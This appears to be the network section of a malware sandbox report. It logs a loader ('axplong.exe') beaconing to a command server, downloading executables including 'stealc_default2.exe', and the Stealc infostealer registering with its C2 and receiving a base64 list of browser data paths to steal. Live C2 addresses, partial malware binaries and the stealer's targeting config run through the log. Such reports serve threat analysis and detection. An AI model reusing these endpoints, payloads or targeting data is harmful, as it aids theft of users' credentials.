Aug 26, 2024 23:29:11.532093048 CEST	448	IN	Data Raw: fa cf 5b 69 b1 96 2c d7 f3 c0 ce aa 54 d5 00 d4 b2 b0 33 8a 18 03 9d 15 5b dd 02 bb 26 a0 82 a3 22 0b b9 1b ff e1 41 f8 cc 77 32 ae 4b 8c f3 18 40 65 5e e4 6e 69 35 a6 d4 10 49 d3 f9 28 05 84 33 8e 3e e2 0f 03 53 fb a2 9a a9 64 51 22 38 ee 6a 1e Data Ascii: [i,T3[&"Aw2K@e^ni5I(3>SdQ"8jDwy]dO3gUKzm]c"~\|0d9wX:>4'>tMRacE[7\|sOS'f@je8#FoP^%,^pWA?\w9\>
Aug 26, 2024 23:29:11.532387018 CEST	1236	IN	Data Raw: 91 27 14 8e 15 d2 0b 00 35 41 5c 7f df 10 54 46 41 61 8b 35 89 00 bf 4a a2 7e c3 5a 44 ba 66 68 49 fd d5 56 e8 6e 62 f9 a8 22 83 0f 92 82 49 43 70 67 38 1a 96 42 71 6a 94 a0 14 b8 04 56 4f a3 94 fe 41 14 d6 30 d6 1f 18 99 68 6b 5f 58 a9 b0 f8 ca Data Ascii: '5A\TFAa5J~ZDfhIVnb"ICpg8BqjVOA0hk_X29H`W,R}+\|ie\f$R?N9%cP?1LnBGr<N4SH~~4vTMUX!pPWuL\|eqY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49725	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:13.511012077 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000004001&unit=246122658369
Aug 26, 2024 23:29:14.222201109 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49726	154.216.18.223	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:14.236423969 CEST	50	OUT	GET /setup2.exe HTTP/1.1 Host: 154.216.18.223
Aug 26, 2024 23:29:14.902966976 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:14 GMT Content-Type: application/octet-stream Content-Length: 358912 Last-Modified: Fri, 23 Aug 2024 11:05:54 GMT Connection: keep-alive ETag: "66c86d12-57a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 b4 77 04 ec d5 19 57 ec d5 19 57 ec d5 19 57 83 a3 b2 57 f4 d5 19 57 83 a3 87 57 fc d5 19 57 83 a3 b3 57 ba d5 19 57 e5 ad 8a 57 eb d5 19 57 ec d5 18 57 68 d5 19 57 83 a3 b6 57 ed d5 19 57 83 a3 83 57 ed d5 19 57 83 a3 84 57 ed d5 19 57 52 69 63 68 ec d5 19 57 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d1 71 4f 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 7c 03 00 00 2c 1b 00 00 00 00 00 38 45 00 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 1e 00 00 04 00 00 e2 6b 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$wWWWWWWWWWWWWhWWWWWWWRichWPELqOd\|,8E@k~P 1@.text6z\| `.datav@.rsrc @@
Aug 26, 2024 23:29:14.902986050 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 81 03 00 1e 81 03 00 36 81 03 00 4e 81 03 00 62 81 03 00 80 81 03 00 9a 81 03 Data Ascii: 6Nb *:N^l$.BVfv.H^p
Aug 26, 2024 23:29:14.903012037 CEST	448	IN	Data Raw: 00 65 00 64 00 20 00 28 00 2f 00 63 00 6c 00 72 00 29 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 66 00 72 00 6f 00 6d 00 20 00 61 00 20 00 6e 00 61 00 74 00 69 00 76 00 65 00 20 00 63 00 6f 00 6e 00 73 00 74 00 72 00 75 00 63 Data Ascii: ed (/clr) function from a native constructor or from DllMain.R6032- not enough space for locale informationR603
Aug 26, 2024 23:29:14.903029919 CEST	1236	IN	Data Raw: 00 2d 00 20 00 43 00 52 00 54 00 20 00 6e 00 6f 00 74 00 20 00 69 00 6e 00 69 00 74 00 69 00 61 00 6c 00 69 00 7a 00 65 00 64 00 0d 00 0a 00 00 00 00 00 52 00 36 00 30 00 32 00 38 00 0d 00 0a 00 2d 00 20 00 75 00 6e 00 61 00 62 00 6c 00 65 00 20 Data Ascii: - CRT not initializedR6028- unable to initialize heapR6027- not enough space for lowio initialization
Aug 26, 2024 23:29:14.903040886 CEST	1236	IN	Data Raw: 00 00 00 d0 1a 40 00 08 00 00 00 78 1a 40 00 09 00 00 00 20 1a 40 00 0a 00 00 00 d8 19 40 00 10 00 00 00 80 19 40 00 11 00 00 00 20 19 40 00 12 00 00 00 d8 18 40 00 13 00 00 00 80 18 40 00 18 00 00 00 10 18 40 00 19 00 00 00 c0 17 40 00 1a 00 00 Data Ascii: @x@ @@@ @@@@@P@@@P@@ @!0@x@y@z@@@Microsoft Visual C++ Runtime Libra
Aug 26, 2024 23:29:14.903053045 CEST	1236	IN	Data Raw: 00 4c 00 00 00 00 00 46 6c 73 46 72 65 65 00 46 6c 73 53 65 74 56 61 6c 75 65 00 46 6c 73 47 65 74 56 61 6c 75 65 00 46 6c 73 41 6c 6c 6f 63 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f Data Ascii: LFlsFreeFlsSetValueFlsGetValueFlsAlloc !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~=
Aug 26, 2024 23:29:14.903117895 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 68 00 28 00 28 00 28 00 28 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 48 00 10 00 10 00 10 00 10 Data Ascii: h(((( H
Aug 26, 2024 23:29:14.903130054 CEST	1236	IN	Data Raw: c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 20 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f Data Ascii: Complete Object Locator' Class Hierarchy Descriptor' Base Class Array' Base Class Descriptor at ( Type Descriptor'`local static thread guard'`managed vector copy constru
Aug 26, 2024 23:29:14.903146029 CEST	1236	IN	Data Raw: 3d 00 00 2a 3d 00 00 7c 7c 00 00 26 26 00 00 7c 00 00 00 5e 00 00 00 7e 00 00 00 28 29 00 00 2c 00 00 00 3e 3d 00 00 3e 00 00 00 3c 3d 00 00 3c 00 00 00 25 00 00 00 2f 00 00 00 2d 3e 2a 00 26 00 00 00 2b 00 00 00 2d 00 00 00 2d 2d 00 00 2b 2b 00 Data Ascii: ==\|\|&&\|^~(),>=><=<%/->&+---++*->operator[]!===!<<>> delete new__unaligned__restrict__ptr64__eabi__clrcall__fastcall__thiscall__stdcall__pascal
Aug 26, 2024 23:29:14.903157949 CEST	1236	IN	Data Raw: 8d 00 00 90 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 8b f1 c7 06 a4 31 40 00 e8 19 08 00 00 f6 44 24 08 01 74 09 56 e8 12 0a 00 00 83 c4 04 8b c6 5e c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 81 00 e1 34 ef c6 c3 Data Ascii: V1@D$tV^4U]] SUV3W;x\|$ D$($I\|$ 3=]YutV$4PVVVV@VVt@V$4Q@VVV@VVVVVVVV@V
Aug 26, 2024 23:29:14.907910109 CEST	1236	IN	Data Raw: 1d 5c 10 40 00 a1 40 00 5e 00 8a 8c 30 4b 13 01 00 8b 15 94 ec 5d 00 88 0c 32 81 3d 04 f2 5d 00 90 04 00 00 75 32 6a 00 6a 00 6a 00 6a 00 ff d7 6a 00 ff d3 6a 00 ff 15 48 10 40 00 8d 45 f4 50 6a 00 6a 00 6a 00 ff 15 8c 10 40 00 6a 00 6a 00 6a 00 Data Ascii: \@@^0K]2=]u2jjjjjjH@EPjjj@jjj@F;5]r=x@@3]u8jRjhh1@jjjjjjjjj@jjj,@F\|=\|@33au]EE]Ft\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49730	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:16.158694983 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000005001&unit=246122658369
Aug 26, 2024 23:29:16.922339916 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Aug 26, 2024 23:29:16.924124956 CEST	63	OUT	GET /inc/stealc_default2.exe HTTP/1.1 Host: 185.215.113.16
Aug 26, 2024 23:29:17.171339989 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:17 GMT Content-Type: application/octet-stream Content-Length: 192000 Last-Modified: Sat, 24 Aug 2024 14:58:01 GMT Connection: keep-alive ETag: "66c9f4f9-2ee00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 e0 c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$bu^uku_{vfz{fuZuhRichPELfB"d@0$@<#$.textJ .rdata@@.data+!@.reloc*D#F@B
Aug 26, 2024 23:29:17.171406984 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 79 b9 41 00 70 c8 41 00 d9 c8 41 00 00 00 00 Data Ascii: yApAAUQEE}tMUUEEE]UEExMUMMM]UQSjh0hAj$bE
Aug 26, 2024 23:29:17.171439886 CEST	448	IN	Data Raw: 8b 8d 10 fc ff ff 51 83 ec 0c 8b cc 8d 95 04 fc ff ff 52 e8 bb 8c 01 00 81 ec 88 00 00 00 8b cc 8d 45 08 50 e8 ca 00 00 00 8d 8d a4 fb ff ff 51 e8 9e 37 01 00 81 c4 a0 00 00 00 8d 8d a4 fb ff ff e8 ed 8c 01 00 8d 8d f8 fb ff ff e8 b2 8f 01 00 50 Data Ascii: QREPQ7PbjjRAM]UQMM\|nMHcM<XM0MM]
Aug 26, 2024 23:29:17.171473026 CEST	1236	IN	Data Raw: 7c e8 0d 8b 01 00 8b 45 fc 8b e5 5d c2 04 00 cc cc cc cc 55 8b ec 51 89 4d fc 8b 4d fc 83 c1 24 e8 4e 8b 01 00 8b 4d fc 83 c1 18 e8 43 8b 01 00 8b 4d fc 83 c1 0c e8 38 8b 01 00 8b 4d fc e8 30 8b 01 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|E]UQMM$NMCM8M0]UQMEPMMQMURME$PM$wE]UthBMhBMEttW
Aug 26, 2024 23:29:17.171508074 CEST	1236	IN	Data Raw: 88 01 00 8b c8 e8 45 88 01 00 50 8d 8d 94 fe ff ff e8 29 87 01 00 8d 8d 30 fd ff ff e8 7e 86 01 00 8d 8d 3c fd ff ff e8 73 86 01 00 8d 8d 48 fd ff ff e8 68 86 01 00 8d 8d 54 fd ff ff e8 5d 86 01 00 8d 8d 60 fd ff ff e8 52 86 01 00 83 ec 0c 8b cc Data Ascii: EP)0~<sHhT]`RRlhBahVBPMQRhUBPbQ RPd
Aug 26, 2024 23:29:17.171540022 CEST	448	IN	Data Raw: 51 04 3b 55 0c 7c 05 8b 45 08 eb 0e 8b 45 08 8b 48 08 89 4d 08 eb d7 8b 45 08 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 33 d2 b9 00 10 00 00 f7 f1 85 d2 74 0c 8b 55 08 81 c2 00 10 00 00 89 55 08 8b 45 08 c1 e8 0c 5d c3 Data Ascii: Q;U\|EEHME]UE3tUUE]UEEMQ+UUUEEMQ+UEPMUQEMHUEHJUztEHUQEMHUEE]Ub;EuMbU
Aug 26, 2024 23:29:17.171575069 CEST	1236	IN	Data Raw: 00 00 00 6a 10 e8 61 fe ff ff 83 c4 04 03 45 f8 8b 4d fc 39 41 04 7e 2a 8b 55 fc 8b 42 04 2b 45 f8 50 8b 4d fc 51 e8 70 fe ff ff 83 c4 08 89 45 f4 8b 55 f4 c7 02 01 00 00 00 8b 45 f4 a3 90 d1 62 00 8b 4d fc 51 e8 20 ff ff ff 83 c4 04 8b e5 5d c3 Data Ascii: jaEM9A~*UB+EPMQpEUEbMQ ]UQ}ufEPEMUztEH9tUBPMQxUztEH9tUREHQQ]Ujh$Bh4B\#
Aug 26, 2024 23:29:17.171622992 CEST	1236	IN	Data Raw: 1f 00 00 83 c4 0c a3 1c ce 62 00 6a 07 68 8c 1f 42 00 68 94 1f 42 00 e8 5b 1f 00 00 83 c4 0c a3 d0 c8 62 00 6a 0b 68 9c 1f 42 00 68 a8 1f 42 00 e8 42 1f 00 00 83 c4 0c a3 00 cc 62 00 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: bjhBhB[bjhBhBBb]UjhBhBbbjhBhB\|bjhBhB@bjhBhBbbbjhBhB
Aug 26, 2024 23:29:17.171654940 CEST	1236	IN	Data Raw: 5c cb 62 00 6a 0e 68 a4 24 42 00 68 b4 24 42 00 e8 8e 1a 00 00 83 c4 0c a3 a8 cb 62 00 6a 20 68 c4 24 42 00 68 e8 24 42 00 e8 75 1a 00 00 83 c4 0c a3 a0 c8 62 00 6a 0c 68 0c 25 42 00 68 1c 25 42 00 e8 5c 1a 00 00 83 c4 0c a3 20 cc 62 00 6a 09 68 Data Ascii: \bjh$Bh$Bbj h$Bh$Bubjh%Bh%B\ bjh,%Bh8%BChbjhD%BhX%B*hbjhl%Bhx%Bbjh%Bh%Bbjh%Bh%Bbjh%Bh%Bbjh%Bh%B
Aug 26, 2024 23:29:17.171686888 CEST	1236	IN	Data Raw: 68 9c 2b 42 00 e8 c5 15 00 00 83 c4 0c a3 04 cd 62 00 6a 0a 68 b4 2b 42 00 68 c0 2b 42 00 e8 ac 15 00 00 83 c4 0c a3 2c cd 62 00 6a 09 68 cc 2b 42 00 68 d8 2b 42 00 e8 93 15 00 00 83 c4 0c a3 bc cc 62 00 6a 10 68 e4 2b 42 00 68 f8 2b 42 00 e8 7a Data Ascii: h+Bbjh+Bh+B,bjh+Bh+Bbjh+Bh+Bzxbjh,Bh,Babjh,,Bh<,BH\|bjhL,BhX,B/bjhd,Bht,B@bjh,Bh,Bbjh,Bh,Bb
Aug 26, 2024 23:29:17.171736002 CEST	328	IN	Data Raw: c4 0c a3 24 c9 62 00 6a 05 68 9c 32 42 00 68 a4 32 42 00 e8 e3 10 00 00 83 c4 0c a3 5c c9 62 00 6a 07 68 ac 32 42 00 68 b4 32 42 00 e8 ca 10 00 00 83 c4 0c a3 dc c8 62 00 6a 0a 68 bc 32 42 00 68 c8 32 42 00 e8 b1 10 00 00 83 c4 0c a3 9c ca 62 00 Data Ascii: $bjh2Bh2B\bjh2Bh2Bbjh2Bh2Bbjh2Bh2BPbjh2Bh2Blbjh2Bh2Bf(bjh3Bh3BMpbjh3Bh3B4bjth83Bh3Bbjh(4Bh04B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49733	185.215.113.17	80	1848	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:18.050764084 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.17 Connection: Keep-Alive Cache-Control: no-cache
Aug 26, 2024 23:29:18.799863100 CEST	203	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 26, 2024 23:29:18.802710056 CEST	416	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJJDGHCBGDHIECBGIDA Host: 185.215.113.17 Content-Length: 215 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 31 38 37 36 43 42 45 36 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 2d 2d 0d 0a Data Ascii: ------GHJJDGHCBGDHIECBGIDAContent-Disposition: form-data; name="hwid"F51876CBE6684217651120------GHJJDGHCBGDHIECBGIDAContent-Disposition: form-data; name="build"default2------GHJJDGHCBGDHIECBGIDA--
Aug 26, 2024 23:29:19.513113976 CEST	407	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:18 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 6a 4d 34 4e 54 6b 33 4d 44 59 77 5a 6a 4d 32 4e 32 49 79 4e 6a 64 6d 59 57 45 32 4f 57 51 32 4e 6d 5a 6b 5a 54 59 30 4f 47 4e 6d 4d 54 5a 69 4d 47 55 33 59 6d 4e 6d 4e 7a 51 79 5a 54 52 6c 4e 57 51 77 4e 6a 49 33 4e 6d 49 7a 4d 47 51 30 4d 32 59 7a 5a 6d 49 33 4e 6d 49 30 4d 7a 64 69 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MjM4NTk3MDYwZjM2N2IyNjdmYWE2OWQ2NmZkZTY0OGNmMTZiMGU3YmNmNzQyZTRlNWQwNjI3NmIzMGQ0M2YzZmI3NmI0MzdifHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Aug 26, 2024 23:29:19.517781019 CEST	469	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJDBAAEGDBKKECBGIJEB Host: 185.215.113.17 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 2d 2d 0d 0a Data Ascii: ------JJDBAAEGDBKKECBGIJEBContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------JJDBAAEGDBKKECBGIJEBContent-Disposition: form-data; name="message"browsers------JJDBAAEGDBKKECBGIJEB--
Aug 26, 2024 23:29:19.763876915 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:19 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Aug 26, 2024 23:29:19.763961077 CEST	164	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhl
